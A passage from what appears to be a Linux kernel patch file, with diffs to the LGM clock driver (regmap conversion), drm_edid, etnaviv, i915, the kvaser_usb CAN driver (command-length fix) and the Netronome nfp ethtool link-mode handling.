+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	return rate64;
+ }
+@@ -600,7 +555,6 @@ int lgm_clk_register_ddiv(struct lgm_clk_provider *ctx,
+ 		init.num_parents = 1;
+ 
+ 		ddiv->membase = ctx->membase;
+-		ddiv->lock = ctx->lock;
+ 		ddiv->reg = list->reg;
+ 		ddiv->shift0 = list->shift0;
+ 		ddiv->width0 = list->width0;
+diff --git a/drivers/clk/x86/clk-cgu.h b/drivers/clk/x86/clk-cgu.h
+index 4e22bfb223128..bcaf8aec94e5d 100644
+--- a/drivers/clk/x86/clk-cgu.h
++++ b/drivers/clk/x86/clk-cgu.h
+@@ -1,28 +1,28 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ /*
+- * Copyright(c) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
++ * Copyright (C) 2020 Intel Corporation.
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ 
+ #ifndef __CLK_CGU_H
+ #define __CLK_CGU_H
+ 
+-#include <linux/io.h>
++#include <linux/regmap.h>
+ 
+ struct lgm_clk_mux {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	u8 width;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_divider {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	u8 width;
+@@ -30,12 +30,11 @@ struct lgm_clk_divider {
+ 	u8 width_gate;
+ 	unsigned long flags;
+ 	const struct clk_div_table *table;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_ddiv {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift0;
+ 	u8 width0;
+@@ -48,16 +47,14 @@ struct lgm_clk_ddiv {
+ 	unsigned int mult;
+ 	unsigned int div;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_gate {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ enum lgm_clk_type {
+@@ -77,11 +74,10 @@ enum lgm_clk_type {
+  * @clk_data: array of hw clocks and clk number.
+  */
+ struct lgm_clk_provider {
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	struct device_node *np;
+ 	struct device *dev;
+ 	struct clk_hw_onecell_data clk_data;
+-	spinlock_t lock;
+ };
+ 
+ enum pll_type {
+@@ -92,11 +88,10 @@ enum pll_type {
+ 
+ struct lgm_clk_pll {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	unsigned long flags;
+ 	enum pll_type type;
+-	spinlock_t lock;
+ };
+ 
+ /**
+@@ -202,6 +197,8 @@ struct lgm_clk_branch {
+ /* clock flags definition */
+ #define CLOCK_FLAG_VAL_INIT	BIT(16)
+ #define MUX_CLK_SW		BIT(17)
++#define GATE_CLK_HW		BIT(18)
++#define DIV_CLK_NO_MASK		BIT(19)
+ 
+ #define LGM_MUX(_id, _name, _pdata, _f, _reg,		\
+ 		_shift, _width, _cf, _v)		\
+@@ -300,29 +297,32 @@ struct lgm_clk_branch {
+ 		.div = _d,					\
+ 	}
+ 
+-static inline void lgm_set_clk_val(void __iomem *membase, u32 reg,
++static inline void lgm_set_clk_val(struct regmap *membase, u32 reg,
+ 				   u8 shift, u8 width, u32 set_val)
+ {
+ 	u32 mask = (GENMASK(width - 1, 0) << shift);
+-	u32 regval;
+ 
+-	regval = readl(membase + reg);
+-	regval = (regval & ~mask) | ((set_val << shift) & mask);
+-	writel(regval, membase + reg);
++	regmap_update_bits(membase, reg, mask, set_val << shift);
+ }
+ 
+-static inline u32 lgm_get_clk_val(void __iomem *membase, u32 reg,
++static inline u32 lgm_get_clk_val(struct regmap *membase, u32 reg,
+ 				  u8 shift, u8 width)
+ {
+ 	u32 mask = (GENMASK(width - 1, 0) << shift);
+ 	u32 val;
+ 
+-	val = readl(membase + reg);
++	if (regmap_read(membase, reg, &val)) {
++		WARN_ONCE(1, "Failed to read clk reg: 0x%x\n", reg);
++		return 0;
++	}
++
+ 	val = (val & mask) >> shift;
+ 
+ 	return val;
+ }
+ 
++
++
+ int lgm_clk_register_branches(struct lgm_clk_provider *ctx,
+ 			      const struct lgm_clk_branch *list,
+ 			      unsigned int nr_clk);
+diff --git a/drivers/clk/x86/clk-lgm.c b/drivers/clk/x86/clk-lgm.c
+index 020f4e83a5ccb..f69455dd1c980 100644
+--- a/drivers/clk/x86/clk-lgm.c
++++ b/drivers/clk/x86/clk-lgm.c
+@@ -1,10 +1,12 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ #include <linux/clk-provider.h>
++#include <linux/mfd/syscon.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <dt-bindings/clock/intel,lgm-clk.h>
+@@ -253,8 +255,8 @@ static const struct lgm_clk_branch lgm_branch_clks[] = {
+ 	LGM_FIXED(LGM_CLK_SLIC, "slic", NULL, 0, CGU_IF_CLK1,
+ 		  8, 2, CLOCK_FLAG_VAL_INIT, 8192000, 2),
+ 	LGM_FIXED(LGM_CLK_DOCSIS, "v_docsis", NULL, 0, 0, 0, 0, 0, 16000000, 0),
+-	LGM_DIV(LGM_CLK_DCL, "dcl", "v_ifclk", 0, CGU_PCMCR,
+-		25, 3, 0, 0, 0, 0, dcl_div),
++	LGM_DIV(LGM_CLK_DCL, "dcl", "v_ifclk", CLK_SET_RATE_PARENT, CGU_PCMCR,
++		25, 3, 0, 0, DIV_CLK_NO_MASK, 0, dcl_div),
+ 	LGM_MUX(LGM_CLK_PCM, "pcm", pcm_p, 0, CGU_C55_PCMCR,
+ 		0, 1, CLK_MUX_ROUND_CLOSEST, 0),
+ 	LGM_FIXED_FACTOR(LGM_CLK_DDR_PHY, "ddr_phy", "ddr",
+@@ -433,13 +435,15 @@ static int lgm_cgu_probe(struct platform_device *pdev)
+ 
+ 	ctx->clk_data.num = CLK_NR_CLKS;
+ 
+-	ctx->membase = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(ctx->membase))
++	ctx->membase = syscon_node_to_regmap(np);
++	if (IS_ERR(ctx->membase)) {
++		dev_err(dev, "Failed to get clk CGU iomem\n");
+ 		return PTR_ERR(ctx->membase);
++	}
++
+ 
+ 	ctx->np = np;
+ 	ctx->dev = dev;
+-	spin_lock_init(&ctx->lock);
+ 
+ 	ret = lgm_clk_register_plls(ctx, lgm_pll_clks,
+ 				    ARRAY_SIZE(lgm_pll_clks));
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index b36abfa915813..9d82de4c0a8b0 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5827,7 +5827,8 @@ static void drm_parse_hdmi_forum_scds(struct drm_connector *connector,
+ 			else if (hf_scds[11] & DRM_EDID_DSC_10BPC)
+ 				hdmi_dsc->bpc_supported = 10;
+ 			else
+-				hdmi_dsc->bpc_supported = 0;
++				/* Supports min 8 BPC if DSC 1.2 is supported*/
++				hdmi_dsc->bpc_supported = 8;
+ 
+ 			dsc_max_frl_rate = (hf_scds[12] & DRM_EDID_DSC_MAX_FRL_RATE_MASK) >> 4;
+ 			drm_get_max_frl_rate(dsc_max_frl_rate, &hdmi_dsc->max_lanes,
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+index 55479cb8b1ac3..67bdce5326c6e 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+@@ -80,10 +80,10 @@ static int etnaviv_iommu_map(struct etnaviv_iommu_context *context, u32 iova,
+ 		return -EINVAL;
+ 
+ 	for_each_sgtable_dma_sg(sgt, sg, i) {
+-		u32 pa = sg_dma_address(sg) - sg->offset;
++		phys_addr_t pa = sg_dma_address(sg) - sg->offset;
+ 		size_t bytes = sg_dma_len(sg) + sg->offset;
+ 
+-		VERB("map[%d]: %08x %08x(%zx)", i, iova, pa, bytes);
++		VERB("map[%d]: %08x %pap(%zx)", i, iova, &pa, bytes);
+ 
+ 		ret = etnaviv_context_map(context, da, pa, bytes, prot);
+ 		if (ret)
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index 34f2d9da201e2..fe4f279aaeb3e 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1130,7 +1130,6 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ 	{}
+ };
+ 
+-__maybe_unused
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+index f688124d6d669..ef341c4254fc8 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+@@ -545,6 +545,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 					    u8 cmd_no, int channel)
+ {
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -552,6 +553,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = cmd_no;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	if (channel < 0) {
+ 		kvaser_usb_hydra_set_cmd_dest_he
+ 				(cmd, KVASER_USB_HYDRA_HE_ADDRESS_ILLEGAL);
+@@ -568,7 +570,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -584,6 +586,7 @@ kvaser_usb_hydra_send_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_ATOMIC);
+@@ -591,14 +594,14 @@ kvaser_usb_hydra_send_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = cmd_no;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd_async(priv, cmd,
+-					kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd_async(priv, cmd, cmd_len);
+ 	if (err)
+ 		kfree(cmd);
+ 
+@@ -742,6 +745,7 @@ static int kvaser_usb_hydra_get_single_capability(struct kvaser_usb *dev,
+ {
+ 	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	u32 value = 0;
+ 	u32 mask = 0;
+ 	u16 cap_cmd_res;
+@@ -753,13 +757,14 @@ static int kvaser_usb_hydra_get_single_capability(struct kvaser_usb *dev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_CAPABILITIES_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	cmd->cap_req.cap_cmd = cpu_to_le16(cap_cmd_req);
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he(cmd, card_data->hydra.sysdbg_he);
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -1578,6 +1583,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_usb_net_hydra_priv *hydra = priv->sub_priv;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	if (!hydra)
+@@ -1588,6 +1594,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_BUSPARAMS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+@@ -1597,7 +1604,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 
+ 	reinit_completion(&priv->get_busparams_comp);
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		return err;
+ 
+@@ -1624,6 +1631,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1631,6 +1639,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	memcpy(&cmd->set_busparams_req.busparams_nominal, busparams,
+ 	       sizeof(cmd->set_busparams_req.busparams_nominal));
+ 
+@@ -1639,7 +1648,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 
+ 	kfree(cmd);
+ 
+@@ -1652,6 +1661,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1659,6 +1669,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_FD_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	memcpy(&cmd->set_busparams_req.busparams_data, busparams,
+ 	       sizeof(cmd->set_busparams_req.busparams_data));
+ 
+@@ -1676,7 +1687,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 
+ 	kfree(cmd);
+ 
+@@ -1804,6 +1815,7 @@ static int kvaser_usb_hydra_get_software_info(struct kvaser_usb *dev)
+ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ {
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 	u32 flags;
+ 	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
+@@ -1813,6 +1825,7 @@ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_SOFTWARE_DETAILS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	cmd->sw_detail_req.use_ext_cmd = 1;
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 				(cmd, KVASER_USB_HYDRA_HE_ADDRESS_ILLEGAL);
+@@ -1820,7 +1833,7 @@ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -1938,6 +1951,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ {
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	if ((priv->can.ctrlmode &
+@@ -1953,6 +1967,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_DRIVERMODE_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+@@ -1962,7 +1977,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ 	else
+ 		cmd->set_ctrlmode.mode = KVASER_USB_HYDRA_CTRLMODE_NORMAL;
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	kfree(cmd);
+ 
+ 	return err;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_main.h b/drivers/net/ethernet/netronome/nfp/nfp_main.h
+index afd3edfa24283..b9266cf72a172 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_main.h
++++ b/drivers/net/ethernet/netronome/nfp/nfp_main.h
+@@ -28,6 +28,7 @@ struct nfp_hwinfo;
+ struct nfp_mip;
+ struct nfp_net;
+ struct nfp_nsp_identify;
++struct nfp_eth_media_buf;
+ struct nfp_port;
+ struct nfp_rtsym;
+ struct nfp_rtsym_table;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+index 991059d6cb32e..af376b9000677 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
++++ b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+@@ -293,6 +293,182 @@ nfp_net_set_fec_link_mode(struct nfp_eth_table_port *eth_port,
+ 	}
+ }
+ 
++static const struct nfp_eth_media_link_mode {
++	u16 ethtool_link_mode;
++	u16 speed;
++} nfp_eth_media_table[NFP_MEDIA_LINK_MODES_NUMBER] = {
++	[NFP_MEDIA_1000BASE_CX] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_1000baseKX_Full_BIT,
++		.speed			= NFP_SPEED_1G,
++	},
++	[NFP_MEDIA_1000BASE_KX] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_1000baseKX_Full_BIT,
++		.speed			= NFP_SPEED_1G,
++	},
++	[NFP_MEDIA_10GBASE_KX4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKX4_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_CX4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKX4_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_ER] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseER_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_25GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_KR_S] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_CR_S] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_40GBASE_CR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_KR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_SR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseSR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_LR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseLR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_50GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_LR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_ER] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_FR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_100GBASE_KR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_SR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseSR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_CR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_KP4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_CR10] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++};
++
++static const unsigned int nfp_eth_speed_map[NFP_SUP_SPEED_NUMBER] = {
++	[NFP_SPEED_1G]		= SPEED_1000,
++	[NFP_SPEED_10G]		= SPEED_10000,
++	[NFP_SPEED_25G]		= SPEED_25000,
++	[NFP_SPEED_40G]		= SPEED_40000,
++	[NFP_SPEED_50G]		= SPEED_50000,
++	[NFP_SPEED_100G]	= SPEED_100000,
++};
++
++static void nfp_add_media_link_mode(struct nfp_port *port,
++				    struct nfp_eth_table_port *eth_port,
++				    struct ethtool_link_ksettings *cmd)
++{
++	u64 supported_modes[2], advertised_modes[2];
++	struct nfp_eth_media_buf ethm = {
++		.eth_index = eth_port->eth_index,
++	};
++	struct nfp_cpp *cpp = port->app->cpp;
++
++	if (nfp_eth_read_media(cpp, &ethm)) {
++		bitmap_fill(port->speed_bitmap, NFP_SUP_SPEED_NUMBER);
++		return;
++	}
++
++	bitmap_zero(port->speed_bitmap, NFP_SUP_SPEED_NUMBER);
++
++	for (u32 i = 0; i < 2; i++) {
++		supported_modes[i] = le64_to_cpu(ethm.supported_modes[i]);
++		advertised_modes[i] = le64_to_cpu(ethm.advertised_modes[i]);
++	}
++
++	for (u32 i = 0; i < NFP_MEDIA_LINK_MODES_NUMBER; i++) {
++		if (i < 64) {
++			if (supported_modes[0] & BIT_ULL(i)) {
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.supported);
++				__set_bit(nfp_eth_media_table[i].speed,
++					  port->speed_bitmap);
++			}
++
++			if (advertised_modes[0] & BIT_ULL(i))
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.advertising);
++		} else {
++			if (supported_modes[1] & BIT_ULL(i - 64)) {
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.supported);
++				__set_bit(nfp_eth_media_table[i].speed,
++					  port->speed_bitmap);
++			}
++
++			if (advertised_modes[1] & BIT_ULL(i - 64))
++				__set_bit(nfp_eth_media_table[i].ethtool_link_mode,
++					  cmd->link_modes.advertising);
++		}
++	}
++}
++
+ /**
+  * nfp_net_get_link_ksettings - Get Link Speed settings
+  * @netdev:	network interface device structure
+@@ -311,6 +487,8 @@ nfp_net_get_link_ksettings(struct net_device *netdev,
+ 	u16 sts;
+ 
+ 	/* Init to unknowns */
++	ethtool_link_ksettings_zero_link_mode(cmd, supported);
++	ethtool_link_ksettings_zero_link_mode(cmd, advertising);
+ 	ethtool_link_ksettings_add_link_mode(cmd, supported, FIBRE);
+ 	cmd->base.port = PORT_OTHER;
+ 	cmd->base.speed = SPEED_UNKNOWN;
+@@ -321,6 +499,7 @@ nfp_net_get_link_ksettings(struct net_device *netdev,
+ 	if (eth_port) {
+ 		ethtool_link_ksettings_add_link_mode(cmd, supported, Pause);
+ 		ethtool_link_ksettings_add_link_mode(cmd, advertising, Pause);
++		nfp_add_media_link_mode(port, eth_port, cmd);
+ 		if (eth_port->supp_aneg) {
+ 			ethtool_link_ksettings_add_link_mode(cmd, supported, Autoneg);
+ 			if (eth_port->aneg == NFP_ANEG_AUTO) {
+@@ -395,6 +574,22 @@ nfp_net_set_link_ksettings(struct net_device *netdev,
+ 
+ 	if (cmd->base.speed != SPEED_UNKNOWN) {
+ 		u32 speed = cmd->base.speed / eth_port->lanes;
++		bool is_supported = false;
++
++		for (u32 i = 0; i < NFP_SUP_SPEED_NUMBER; i++) {
++			if (cmd->base.speed == nfp_eth_speed_map[i] &&
++			    test_bit(i, port->speed_bitmap)) {
++				is_supported = true;
++				break;
++			}
++		}
++
++		if (!is_supported) {
++			netdev_err(netdev, "Speed %u is not supported.\n",
++				   cmd->base.speed);
++			err = -EINVAL;
++			goto err_bad_set;
++		}
+ 
+ 		if (req_aneg) {
+ 			netdev_err(netdev, "Speed changing is not allowed when working on autoneg mode.\n");
